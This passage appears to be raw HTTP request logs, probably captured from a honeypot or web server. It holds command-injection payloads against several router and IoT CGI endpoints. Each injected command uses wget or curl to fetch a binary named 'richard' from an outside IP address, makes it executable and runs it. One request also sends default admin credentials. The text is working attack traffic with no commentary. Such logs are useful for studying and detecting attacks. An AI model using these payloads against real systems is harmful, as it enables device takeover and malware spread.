  366. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  367. X-Requested-With: XMLHttpRequest
  368. Referer: http://10.0.0.1/network_diagnostic_tools.php
  369. Content-Length: 91
  370. Cookie: PHPSESSID=; auth=
  371. DNT: 1
  372. X-Forwarded-For: 8.8.8.8
  373. Connection: keep-alive
  374.  
  375. GET /pages/systemcall.php?command=|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
  376.  
  377. POST /cgi-bin/cgiServer.exx?system(wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard) HTTP/1.0
  378. Host: 10.0.75.122:80
  379. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  380. Accept-Language: en-US,en;q=0.5
  381. Accept-Encoding: gzip, deflate
  382. Authorization: Basic YWRtaW46YWRtaW4=
  383. Connection: keep-alive
  384. Content-Type: application/x-www-form-urlencoded
  385. Content-Length: 0
  386.  
  387. GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;%22 HTTP/1.0